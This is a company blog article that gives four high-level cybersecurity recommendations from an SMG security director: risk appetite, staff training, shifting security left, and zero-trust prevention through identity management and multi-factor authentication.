Mostafa Abdelmoez, the Group Director of Security & Anti Fraud at SMG shared four things for cyber security any company should consider to make sure their employees and customers are safe.
1. Risk Appetite – How much risk can you chew?
Understanding your business and its biggest risk factors is crucial to deciding how much risk your organisation is willing to take in the pursuit of any value. Otherwise, cyber security efforts could have no limits, guidance, or immediate impact. It’s almost impossible – or at least highly inefficient – to protect something if you don’t understand its risks and weaknesses.
The fundamental mission of cyber security is to protect your organisation, but how? Protection also includes business continuity, preventing loss (monetary or other), or increasing or preserving value for all stakeholders. So you have to understand these dependencies, how they are set up, what exactly you are trying to protect and from whom, and its impact on the business. So after you have done this risk assessment, you can get to work. Usually, starting with data consideration proves to be beneficial.
2. Humans are the first line of Cyber Security defence
The narrative often centers on people as the weakest link when discussing the responsibility of cybersecurity. We believe that to be quite untrue. Humans are the first line of defence for maintaining an organisation’s cyber security. This underscores the importance of providing suitable training to all employees, tailored to their roles or functions within the organization. This can be further encouraged and expanded on with internal events, competitions and rewards. Employees or users generally struggle to identify weaknesses in their cyber security knowledge, which increases the importance of proper training and presenting the training material in an understandable way. It is your responsibility as an organisation to offer a great user experience when conveying information about cyber security, or even when they interact with security in any way.
3. Shifting Left – Integrate cyber security into the fabric!
Now onto the more technical aspects: Monitoring your infrastructures, networks, and products should be a no-brainer. You need to log, audit, and generally be aware of blind spots, which you will only find if you comprehensively monitor your systems.
You have to integrate cyber security in day-to-day business operations. For example: Scan and sign the code before going into production and scan after it has been deployed. Employ different types of security testing like security audits, bug bounty programs, or application scanning. This is often termed Shifting Left in cybersecurity, where security practices start from the outset, even before implementing ideas. The earlier you integrate security, the easier it will become and the more impact it will have.
4. Prevention – Trust nothing, verify everything!
We have now mainly talked about monitoring, which facilitates detection. Ideally, we’re after prevention which can be achieved by investing in Edge Security.
In its simplest form, Edge Security consists of a firewall and an authentication server. Nothing should pass this checkpoint unless someone authorises it. However, even after passing, there should be no inherent trust in anything! Always verify everything.
Think of this approach as having a multitude of edges (or checkpoints) on the inside. Any organisation should heavily invest in identity and access management – be it for its employees or its users. This experience should be seamless and at least prevent phishing, which is widely employed due to its low-effort-high-impact nature. Phishing is what enabled most of the recent big breaches. You can even employ Biometrics, FIDO (Fast IDentity Online), and Hardware Keys. Choose the appropriate method for each user group. It is important to note that each Multi-Factor Authentication Method has its advantages and disadvantages – and also its own thread model, which would bring us back to the first point.
Following these four points could already make a huge difference to your organisation’s cyber security. Raising awareness is definitely very important, which is also why we have put together a list of four things anyone can do to improve their security online.
We thank Mostafa for putting together this list, and let’s keep cyber security a top priority for the whole year!